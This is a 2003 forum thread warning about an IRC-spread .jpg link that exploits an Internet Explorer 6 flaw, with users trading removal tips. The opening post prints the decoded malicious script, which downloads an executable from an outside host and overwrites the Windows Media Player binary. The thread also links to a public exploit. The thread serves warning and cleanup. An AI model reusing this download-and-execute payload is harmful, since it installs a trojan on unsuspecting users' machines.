.JPG Ie 6/Media Player virus

Cr8or · 26-10-2003 2:37pm #1

there seems to be a url floating around IRC

DO NOT CLICK ON IT

http://www.angelfire.xxx/celeb2/picsx/britney.jpg

it is using an exploit that swaps the Windows Media Player with a message from Mindlock by making use of the Internet Explorer 6 XML bypass flaw

Related advisory:
http://packetstormsecurity.nl/0310-advisories/IE6XMLbypass.txt

Working example:
http://packetstormsecurity.nl/0310-exploits/wmpphp.txt

The guy who wrote this encoded the top 9 lines of the file to make it look like normal(ish) page, the encoded lines match the above example. code:

[PHP]
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://scavenger.sharewith.us(dontclick)/patch.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3; s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
[/PHP]

It downloads a file from http://scavenger.sharewith.us(dontclick)/patch.exe (This site has been suspended.)
Someone pointed out that the virus written in Delphi.

Quick fix is to remove C:\\Program Files\\Windows Media Player\\wmplayer.exe and do all the norm stuff like remove it from msconfig

Some people have reported that after infection (on reboot) it removes system files and a format & reinstall or a repar has to be done.

watch out for .jpg links on irc, id say it will pop back up soon enough when they find a new host.

phreak · 26-10-2003 2:53pm

i have the virus and now i can't even start windows... anyone know a way to fix it without a format?

Cr8or · 26-10-2003 2:53pm

run a repair ?

Bard · 26-10-2003 3:40pm

I may have gotten it, and as it only seems to affect wmplayer.exe, I've done the following :-

1. Deleted the Windows Media Player executable
C:\Program Files\Windows Media Player\wmplayer.exe

2. Run the Windows Media Player Setup Wizard
C:\Program Files\Windows Media Player\setup_wm.exe

(This downloads any Windows Media Player components you don't have and reinstalls the application)

Hope it's that simple.

Cr8or · 26-10-2003 3:44pm

check your msconfig & services 2

Bard · 26-10-2003 3:49pm

Originally posted by Cr8or
check your msconfig & services 2

Can you be more specific? What are we looking for in Services in MSCONFIG?

Cr8or · 26-10-2003 3:55pm

anything that shouldn't be there .. I haven't been infected so I duno how it boots with the system ... look for suspicious name id say ... for services tick the don't display Microsoft services check box in msconfig this should shorten down the list a bit.

Bard · 26-10-2003 4:04pm

I disabled one startup item, the only one with %systemroot% in
the command line...

"%systemroot%\system32\dumprep 0 -k"

Didn't remember having seen it before...

Cr8or · 01-11-2003 9:59pm

See http://securityresponse.symantec.com/avcenter/venc/data/irc.trojan.fgt.html
for information about the trojan.

and

http://charmy.tky.hut.fi/brit.txt

oeNeo · 09-01-2004 10:44pm

Is there a way to find out for sure if you have this? I'm just after clicking some .jpg in irc and it opened WMP in the browser. Just now I've discovered IXPLORE.exe in msconfig and ZA is asking me whether I want it to access the interweb. I said no obviously so maybe it hasn't downloaded the actual virus yet?

I've deleted the WMP.exe and am in the process of running a virus scan.

Cr8or · 09-01-2004 11:11pm

there are a few going around remove IXPLORE.exe (prob some sort of backdoor)

also send it into symantec & your av company (its always nice to help)

oeNeo · 10-01-2004 12:25am

The one I clicked was won.attaq.net with lol.jpg at the end.

http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=100749

Vielen Dank to cr8or for his help.

.JPG Ie 6/Media Player virus

Comments